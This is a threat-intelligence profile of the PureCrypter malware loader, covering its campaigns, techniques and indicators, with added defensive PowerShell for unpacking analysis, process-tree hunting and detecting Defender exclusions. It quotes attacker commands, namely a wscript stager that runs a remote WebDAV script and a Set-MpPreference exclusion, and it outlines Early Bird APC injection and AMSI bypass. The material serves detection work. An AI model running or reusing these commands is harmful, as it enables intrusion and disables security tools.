PureCrypter
PureCrypter is a commercial .NET crypter/loader in the PureCoder malware-as-a-service ecosystem, commonly used as a secondary dropper or resource loader to deliver additional malware. The reporting describes it as a .NET-based executable, often obfuscated with SmartAssembly or ConfuserEx, and specifically as a .NET 3DES loader. Its core behavior is to decrypt an embedded resource using 3DES-CBC, decompress it with GZip, load the resulting assembly in memory via Assembly.Load, and invoke it through reflection. Other observed PureCrypter variants are described as .NET resource loaders carrying additional encrypted inner payloads.
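The unpack stage described above, reproduced as an added PowerShell example (not PureCrypter's own code and not taken from any vendor report): it runs the 3DES-CBC decrypt, the GZip decompress and a PE sanity check against a blob that is constructed inline, and shows how a wrong key is rejected. The key, IV and PKCS7 padding are assumptions; this page does not describe how the loader derives them, so an analyst would recover them from the deobfuscated loader and pass them in.

```powershell
# Added example, not PureCrypter's own code: emulate the unpack stage
# (3DES-CBC decrypt -> GZip decompress -> PE sanity check) on a blob built here.
# ASSUMPTIONS: key/IV are supplied by the analyst (recovered from the deobfuscated
# loader); padding is PKCS7, the .NET TripleDES default.

function Compress-GzipBytes([byte[]]$Data) {
    $out = New-Object System.IO.MemoryStream
    $gz  = New-Object System.IO.Compression.GZipStream($out, [System.IO.Compression.CompressionMode]::Compress, $true)
    $gz.Write($Data, 0, $Data.Length)
    $gz.Dispose()                       # writes the gzip trailer; $out stays open (leaveOpen)
    return ,$out.ToArray()
}

function Expand-GzipBytes([byte[]]$Data) {
    $in  = New-Object System.IO.MemoryStream(,$Data)
    $gz  = New-Object System.IO.Compression.GZipStream($in, [System.IO.Compression.CompressionMode]::Decompress)
    $out = New-Object System.IO.MemoryStream
    $gz.CopyTo($out)
    $gz.Dispose()
    return ,$out.ToArray()
}

function Test-PeImage([byte[]]$Bytes) {
    # A managed assembly is still a PE file: 'MZ' at 0, e_lfanew at 0x3C, 'PE\0\0' there.
    if ($Bytes.Length -lt 0x40 -or $Bytes[0] -ne 0x4D -or $Bytes[1] -ne 0x5A) { return $false }
    $lfanew = [BitConverter]::ToInt32($Bytes, 0x3C)
    if ($lfanew -lt 0x40 -or ($lfanew + 4) -gt $Bytes.Length) { return $false }
    return ($Bytes[$lfanew] -eq 0x50 -and $Bytes[$lfanew + 1] -eq 0x45 -and
            $Bytes[$lfanew + 2] -eq 0 -and $Bytes[$lfanew + 3] -eq 0)
}

function Unprotect-PureCrypterResource {
    param([byte[]]$Resource, [byte[]]$Key, [byte[]]$IV)
    $tdes = [System.Security.Cryptography.TripleDES]::Create()
    $tdes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
    $tdes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
    try {
        $plain = $tdes.CreateDecryptor($Key, $IV).TransformFinalBlock($Resource, 0, $Resource.Length)
    } catch [System.Security.Cryptography.CryptographicException] {
        return $null                    # wrong key/IV usually surfaces here as a padding error
    } finally {
        $tdes.Dispose()
    }
    # GZip magic 1F 8B: if it is missing, the key was wrong or this layer is not GZip
    if ($plain.Length -lt 2 -or $plain[0] -ne 0x1F -or $plain[1] -ne 0x8B) { return $null }
    $payload = Expand-GzipBytes $plain
    if (-not (Test-PeImage $payload)) { return $null }
    return ,$payload
}

# --- constructed fixture: a minimal fake PE, wrapped the way the loader expects ---
$fakePe = New-Object byte[] 0x50
$fakePe[0] = 0x4D; $fakePe[1] = 0x5A                        # 'MZ'
[BitConverter]::GetBytes([int]0x40).CopyTo($fakePe, 0x3C)   # e_lfanew -> 0x40
$fakePe[0x40] = 0x50; $fakePe[0x41] = 0x45                  # 'PE\0\0'
$key = [byte[]](1..24 | ForEach-Object { [byte]($_ * 7) })  # invented 24-byte key (K1, K2, K3 distinct)
$iv  = [byte[]](1..8  | ForEach-Object { [byte]($_ * 13) }) # invented 8-byte IV
$tdes = [System.Security.Cryptography.TripleDES]::Create()
$tdes.Mode    = [System.Security.Cryptography.CipherMode]::CBC
$tdes.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7
$gz   = Compress-GzipBytes $fakePe
$blob = $tdes.CreateEncryptor($key, $iv).TransformFinalBlock($gz, 0, $gz.Length)  # what the .resources entry holds
$tdes.Dispose()

$good   = Unprotect-PureCrypterResource -Resource $blob -Key $key -IV $iv
$badKey = [byte[]]$key.Clone(); $badKey[0] = $badKey[0] -bxor 0xFF
$bad    = Unprotect-PureCrypterResource -Resource $blob -Key $badKey -IV $iv
"right key : " + $(if ($good) { "PE recovered, $($good.Length) bytes" } else { 'failed' })
"wrong key : " + $(if ($bad)  { 'unexpected success' } else { 'rejected' })
```

On a real sample, pull the embedded resource out with a metadata reader (dnSpy, dnlib or similar) rather than loading the assembly on the analysis host: Assembly.Load on the recovered payload is exactly the step the crypter performs. Run Test-PeImage on the output, and if the result is itself another loader, expect a further encrypted layer, which is what the inner-payload variants described above look like.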
PureCrypter has been observed distributing multiple RATs and information stealers, including Agent Tesla, RedLine, DarkTrack RAT, and PureLogs, and it appeared among payloads distributed through the Amadey ecosystem alongside Lumma Stealer, Vidar Stealer, StealC, Rhadamanthys, SmokeLoader, XWorm, and AsyncRAT. In SERPENTINE#CLOUD-related intrusions, the delivery chain was repeatedly described as batch stager -> Python loader -> Donut shellcode -> PureCrypter -> inner RAT/payload. In one March 2026 campaign targeting German-speaking victims with fake DATEV invoice lures, two PureCrypter samples were launched via Early Bird APC injection into explorer.exe after staging through Cloudflare trycloudflare WebDAV infrastructure, WSH/WSF/BAT scripts, a downloaded Python runtime, and Donut shellcode. In Fluffy Wolf campaigns targeting Russian organizations between March and May 2026, PowerLoader downloaded and executed PureCrypter, which then deployed final payloads such as PureLogs, PureRAT, and Pay2Key ransomware.
Associated activity links PureCrypter to financially motivated malware operations and MaaS-enabled intrusion chains rather than a single exclusive actor. It was used by Fluffy Wolf against Russian organizations in construction, consulting, manufacturing, engineering, retail, e-commerce, and industrial sectors, primarily via phishing emails themed as debts, reconciliation statements, or legal claims, with malicious RAR archives or GitHub links. It also featured prominently in the SERPENTINE#CLOUD campaign tracked by Securonix and Breakglass Intelligence, which targeted German-speaking businesses with invoice-themed lures and used rotating Cloudflare tunnels, Python loaders, and Donut shellcode.
Observed capabilities and behaviors include in-memory execution of decrypted payloads, reflective loading of .NET assemblies, use as a secondary dropper for encrypted inner payloads, and defense evasion. One report states PureCrypter can send a TLS 1.2-encrypted infection message via Discord webhook. Another observed it executing Set-MpPreference -ExclusionPath to add Windows Defender exclusions. Reported indicators and sample details include loader names such as Fviwknzr.exe and Erqcke.exe; embedded resource names Jaglt and Ctjady; inner payloads including Qdjlj.dll and Mvfsxog.dll; and hashes including Fviwknzr.exe SHA256 dcd22d338a0bc4cf615d126b84dfcda149a34cf18bc43b85f16142dfb019e608, Erqcke.exe SHA256 0ab09a4787ea9cb259cadd3f811a56f7bd0058287634bbaf0388b2cd40464505, Erqcke.exe SHA256 b1c6659ee4ee35540f5ed043b611ac88a7fce9dc2f564168e7d47c43683163f6, Qdjlj.dll SHA256 cdf87d68885caa3e94713ded9dd5e51c39b7bc7ef9bf7d63a4ff5ab917a96b36, and Mvfsxog.dll SHA256 046d0e83c1e6dcaf526127b81b962042e495f5ae3a748f3a9452be62f905acf8.
Groups observed using it
5 distinct threat actors attributed by public researchers.
While they still leverage classic droppers like PureCrypter and Rust-based loaders running Donut shellcode, they have added a potent new tool to their arsenal: PowerLoader.
Its tooling also involves crypters such as HeartCrypt, PureCrypter, and those developed by threat actors like “Roda” and “pjoao1578”...
PureCrypter malware has been observed distributing multiple RATs and information stealers. It is a .NET-based executable, obfuscated with SmartAssembly...
Techniques & procedures
29 distinct techniques documented for this family, organized by ATT&CK tactic.
Resource Development (1 technique)
Initial Access (3 techniques)
Security researchers have uncovered a series of highly sophisticated Fluffy Wolf phishing attacks targeting Russian organizations across various critical sectors.
Using highly deceptive tactics, the attackers send emails masquerading as legitimate corporate communications regarding outstanding debts, reconciliation statements, or legal claims. To bypass modern email security gateways, the attackers heavily rely on malicious RAR attachments...
Execution (7 techniques)
During the 2022 Ukraine Electric Power Attack, Sandworm Team leveraged Scheduled Tasks through a Group Policy Object (GPO) to execute CaddyWiper at a predetermined time.
The batch stagers are the initial execution layer. 29 .bat files recovered across six evidence directories deduplicate to 13 unique templates in four categories.
wscript.exe //B \\tunnel1\DavWWWRoot\dat.wsh, which performs a cross-tunnel redirect to \\tunnel2\DavWWWRoot\dat.wsf
The ZIP contains a Python runtime and one or more loader scripts. Each loader decrypts embedded shellcode, and that shellcode bootstraps the .NET Common Language Runtime (CLR) to load the actual payload.
Persistence (2 techniques)
The content repeatedly describes malware and threat actors establishing persistence by adding values under HKCU/HKLM\Software\Microsoft\Windows\CurrentVersion\Run or RunOnce, and by placing executables, scripts, .lnk files, or batch files in the Windows Startup folder.
Privilege Escalation (4 techniques)
Injection technique: create a suspended notepad.exe , allocate RWX memory, write shellcode via WriteProcessMemory , queue an APC, resume the thread... Instead of notepad.exe, the loaders now create a suspended explorer.exe and use Early Bird APC injection
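A hunting check for the process tree this chain leaves behind, as an added PowerShell example (not from the page or any vendor): it flags a script host run with //B against a \\host\DavWWWRoot\ path, the shape of the stager command in the Execution section, and an explorer.exe whose parent is a script host or Python interpreter rather than the logon chain, which is what a suspended explorer.exe created for Early Bird APC injection looks like in process telemetry. The process records are constructed, and the two allowlists (normal explorer.exe parents, script hosts) are assumptions to tune per environment.

```powershell
# Added example (not from the page or a vendor): hunt for the process-tree shapes this
# chain leaves: (1) wscript/cscript run with //B against a \\host\DavWWWRoot\ UNC path,
# (2) explorer.exe whose parent is a script host or Python rather than the logon chain.
# ASSUMPTIONS: the two allowlists below; the process snapshot is constructed.

$normalExplorerParents = @('userinit.exe', 'winlogon.exe', 'explorer.exe', 'svchost.exe')
$scriptHosts = @('wscript.exe', 'cscript.exe', 'python.exe', 'pythonw.exe', 'cmd.exe', 'powershell.exe', 'pwsh.exe')

function Get-ProcessAncestry {
    # Walk parent links upward; stops at the root, on a self-parent loop, or at MaxDepth
    param([hashtable]$ByPid, [int]$ProcessId, [int]$MaxDepth = 16)
    $chain = @(); $cur = $ProcessId; $depth = 0
    while ($ByPid.ContainsKey($cur) -and $depth -lt $MaxDepth) {
        $p = $ByPid[$cur]; $chain += $p
        $next = [int]$p.ParentProcessId
        if ($next -eq $cur -or $next -eq 0) { break }
        $cur = $next; $depth++
    }
    return ,$chain
}

function Find-SuspiciousProcessTree {
    param([object[]]$Processes)
    $byPid = @{}
    foreach ($p in $Processes) { $byPid[[int]$p.ProcessId] = $p }   # int keys: Win32_Process returns UInt32
    $hits = @()
    foreach ($p in $Processes) {
        $name = $p.Name.ToLower()
        # (1) WebDAV-staged script host: silent mode plus a DavWWWRoot UNC path on the command line
        if (($name -in 'wscript.exe', 'cscript.exe') -and
            $p.CommandLine -match '(?i)//B\b' -and
            $p.CommandLine -match '(?i)\\\\[^\\]+\\DavWWWRoot\\') {
            $hits += [pscustomobject]@{ Pid = $p.ProcessId; Rule = 'webdav_script_stager'; Detail = $p.CommandLine }
        }
        # (2) explorer.exe with an abnormal parent, or a script host anywhere above it
        if ($name -eq 'explorer.exe') {
            $parent     = $byPid[[int]$p.ParentProcessId]
            $parentName = if ($parent) { $parent.Name.ToLower() } else { '<exited>' }
            $chain      = Get-ProcessAncestry -ByPid $byPid -ProcessId ([int]$p.ParentProcessId)
            $scriptAncestor = $chain | Where-Object { $_.Name.ToLower() -in $scriptHosts } | Select-Object -First 1
            if (($parentName -notin $normalExplorerParents) -or $scriptAncestor) {
                $why = "parent=$parentName; script ancestor=" + $(if ($scriptAncestor) { $scriptAncestor.Name } else { 'none' })
                $hits += [pscustomobject]@{ Pid = $p.ProcessId; Rule = 'explorer_abnormal_parent'; Detail = $why }
            }
        }
    }
    return ,$hits
}

# --- constructed process snapshot (invented PIDs, host names and paths) ---
$snapshot = @(
    [pscustomobject]@{ ProcessId = 4;    ParentProcessId = 0;    Name = 'System';       CommandLine = '' }
    [pscustomobject]@{ ProcessId = 600;  ParentProcessId = 4;    Name = 'winlogon.exe'; CommandLine = 'winlogon.exe' }
    [pscustomobject]@{ ProcessId = 700;  ParentProcessId = 600;  Name = 'userinit.exe'; CommandLine = 'userinit.exe' }
    [pscustomobject]@{ ProcessId = 800;  ParentProcessId = 700;  Name = 'explorer.exe'; CommandLine = 'explorer.exe' }   # the user's real shell
    [pscustomobject]@{ ProcessId = 900;  ParentProcessId = 800;  Name = 'wscript.exe';  CommandLine = 'wscript.exe //B \\tunnel1\DavWWWRoot\dat.wsh' }
    [pscustomobject]@{ ProcessId = 950;  ParentProcessId = 900;  Name = 'cmd.exe';      CommandLine = 'cmd.exe /c stage.bat' }
    [pscustomobject]@{ ProcessId = 1000; ParentProcessId = 950;  Name = 'python.exe';   CommandLine = 'python.exe loader.py' }
    [pscustomobject]@{ ProcessId = 1100; ParentProcessId = 1000; Name = 'explorer.exe'; CommandLine = 'explorer.exe' }   # suspended injection target
)

# Live host instead of the snapshot:
#   $snapshot = Get-CimInstance Win32_Process | Select-Object ProcessId, ParentProcessId, Name, CommandLine
Find-SuspiciousProcessTree -Processes $snapshot | Format-Table -AutoSize
```

On the snapshot above the two hits are PID 900 (the WebDAV stager) and PID 1100 (explorer.exe under python.exe). The ancestry walk matters more than the direct-parent check: a loader that inserts one more hop (cmd.exe, conhost.exe) still has a script host above the injected explorer.exe. Point-in-time snapshots miss short-lived stagers, so feed the same logic process-creation events (Sysmon event 1 or Security 4688) where they are available.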
Stealth (10 techniques)
The content repeatedly describes adversaries using Base64, XOR, RC4, AES, hexadecimal encoding, string encryption, code flattening, custom crypters, and other obfuscation methods to hide payloads, strings, configuration data, URLs, and scripts.
Mosquito’s installer is obfuscated with a custom crypter. PureCrypter has used SmartAssembly and .NET Reactor for string encryption and control flow obfuscation. PyDCrypt has been compiled and encrypted with PyInstaller using the --key flag.
Obfuscated Files or Information: Encrypted/Encoded File (T1027.013); evidence: multi-layer XOR + Chaskey CTR + AES
Masquerading: Match Legitimate Name or Location (T1036.005); evidence: DATEV invoice filename
Injection technique: create a suspended notepad.exe , allocate RWX memory, write shellcode via WriteProcessMemory , queue an APC, resume the thread... Instead of notepad.exe, the loaders now create a suspended explorer.exe and use Early Bird APC injection
The content repeatedly describes adversaries and malware deleting files, directories, droppers, scripts, logs, archives, staged data, and other artifacts from compromised systems, e.g., 'APT29 has used SDelete to remove artifacts from victim networks' and 'Lazarus Group malware has deleted files in various ways, including "suicide scripts" to delete malware binaries from the victim.'
Command and Control (5 techniques)
Application Layer Protocol: Web Protocols (T1071.001), stages 1 to 6; evidence: WebDAV over HTTPS for staging
This tool is written in C++ and launches PowerShell in hidden mode, fetching scripts from the command-and-control server. The malware then downloads and runs PureCrypter, which deploys the final payload.
Other (3 techniques)
Defense Evasion, Impair Defenses: Disable or Modify Tools (T1562.001), stages 1 and 3; evidence: AMSI bypass via the Donut AMSI patch and the DcRat runtime AMSI patch
The content repeatedly describes threat actors and malware disabling or modifying security tools, EDR/AV, logging, firewall rules, integrity checkers, and security settings; e.g., 'Agrius used several mechanisms to try to disable security tools' and 'BlackByte disabled security tools such as Windows Defender and the Raccine anti-ransomware tool during operations.'
BlackByte Ransomware 'adds .JS and .EXE extensions to the Microsoft Defender exclusion list'; PureCrypter 'executed Set-MpPreference -ExclusionPath'; QakBot 'modify the Registry to add its binaries to the Windows Defender exclusion list'; Raspberry Robin 'add an exception to Microsoft Defender that excludes the entire main drive'; StrongPity 'add directories used by the malware to the Windows Defender exclusions list'; XLoader 'can add the path of its executable to the Microsoft Defender exclusion list'; ZIPLINE 'can add itself to the exclusion list for the Ivanti Connect Secure Integrity Checker Tool.'
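The Set-MpPreference -ExclusionPath step, turned into a detection as an added PowerShell example (not the page's or any vendor's code): it scans PowerShell script-block events (ID 4104) and Defender configuration-change events (ID 5007) for exclusion additions, with a live query helper for a real host. The event objects below are constructed; their message layout follows the two Windows event types, but every value (times, paths, script-block ID) is invented. Event 5007 is written whichever way the exclusion was set (cmdlet, registry, WMI), so it is the more robust signal; 4104 needs script block logging to be enabled.

```powershell
# Added example (not from the page or a vendor): flag Defender exclusion tampering from
# PowerShell 4104 (script block text) and Defender 5007 (configuration change) events.
# The sample events are constructed; message layouts follow the real event types.

$exclusionCmdlet = '(?i)\b(Set|Add)-MpPreference\b[^\r\n]*-Exclusion(Path|Process|Extension)\b'
$exclusionRegKey = '(?i)HKLM\\SOFTWARE\\Microsoft\\Windows Defender\\Exclusions\\(Paths|Processes|Extensions)\\(?<value>[^=\r\n]+?)\s*='

function Find-DefenderExclusionTampering {
    param([object[]]$Events)
    $hits = @()
    foreach ($e in $Events) {
        switch ($e.Id) {
            4104 {   # PowerShell script block logging: the command as it was actually run
                if ($e.Message -match $exclusionCmdlet) {
                    $line = ($e.Message -split "`r?`n" | Where-Object { $_ -match $exclusionCmdlet } | Select-Object -First 1).Trim()
                    $hits += [pscustomobject]@{ Source = 'PowerShell/4104'; Time = $e.TimeCreated; Evidence = $line }
                }
            }
            5007 {   # Defender configuration change: carries the registry value that was written
                if ($e.Message -match $exclusionRegKey) {
                    $hits += [pscustomobject]@{ Source = 'Defender/5007'; Time = $e.TimeCreated; Evidence = $Matches['value'].Trim() }
                }
            }
        }
    }
    return ,$hits
}

function Get-LiveDefenderExclusionEvents {
    # Live query; run elevated. 4104 needs script block logging, 5007 is always written.
    $ps = Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } -MaxEvents 5000 -ErrorAction SilentlyContinue
    $wd = Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-Windows Defender/Operational'; Id = 5007 } -MaxEvents 500 -ErrorAction SilentlyContinue
    $events = @($ps) + @($wd) | Where-Object { $_ }
    Find-DefenderExclusionTampering -Events @($events)
    # Cross-check the current state regardless of logs:
    #   Get-MpPreference | Select-Object -ExpandProperty ExclusionPath
}

# --- constructed sample events (values invented) ---
$sampleEvents = @(
    [pscustomobject]@{ Id = 4104; TimeCreated = '2026-03-10 09:14:02'
        Message = "Creating Scriptblock text (1 of 1):`r`nSet-MpPreference -ExclusionPath 'C:\Users\Public\Libraries' -Force`r`n`r`nScriptBlock ID: 00000000-0000-0000-0000-000000000001" }
    [pscustomobject]@{ Id = 5007; TimeCreated = '2026-03-10 09:14:03'
        Message = "Microsoft Defender Antivirus Configuration has changed. If this is an unexpected event you should review the settings as this may be the result of malware.`r`n`tOld value: `r`n`tNew value: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Public\Libraries = 0x0" }
    [pscustomobject]@{ Id = 4104; TimeCreated = '2026-03-10 09:20:11'
        Message = "Creating Scriptblock text (1 of 1):`r`nGet-MpComputerStatus | Select-Object AMRunningMode" }   # benign, must not match
)

Find-DefenderExclusionTampering -Events $sampleEvents | Format-Table -AutoSize
```

On the sample the first two events produce hits and the benign Get-MpComputerStatus block does not. Pair the alert with the exclusion value itself: a user-writable directory, a whole drive, or a freshly created path is the pattern to escalate, and the same path is the place to go looking for the staged loader and its inner payload.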
IOCs tracked for this family
36 indicators attributed across vendor reports, sandbox runs, and researcher write-ups.
Recent activity
28 sources tracked across advisories, community write-ups, and news.
PureCrypter is mentioned as a payload distributed by a large botnet cluster within the Amadey ecosystem.
Used by Fluffy Wolf as a classic dropper in phishing campaigns to help deliver malicious payloads.
A crypter/loader that deploys the final payload after PowerLoader runs.
Mentioned only as related malware/reporting in the see-also section, without operational details in the main content.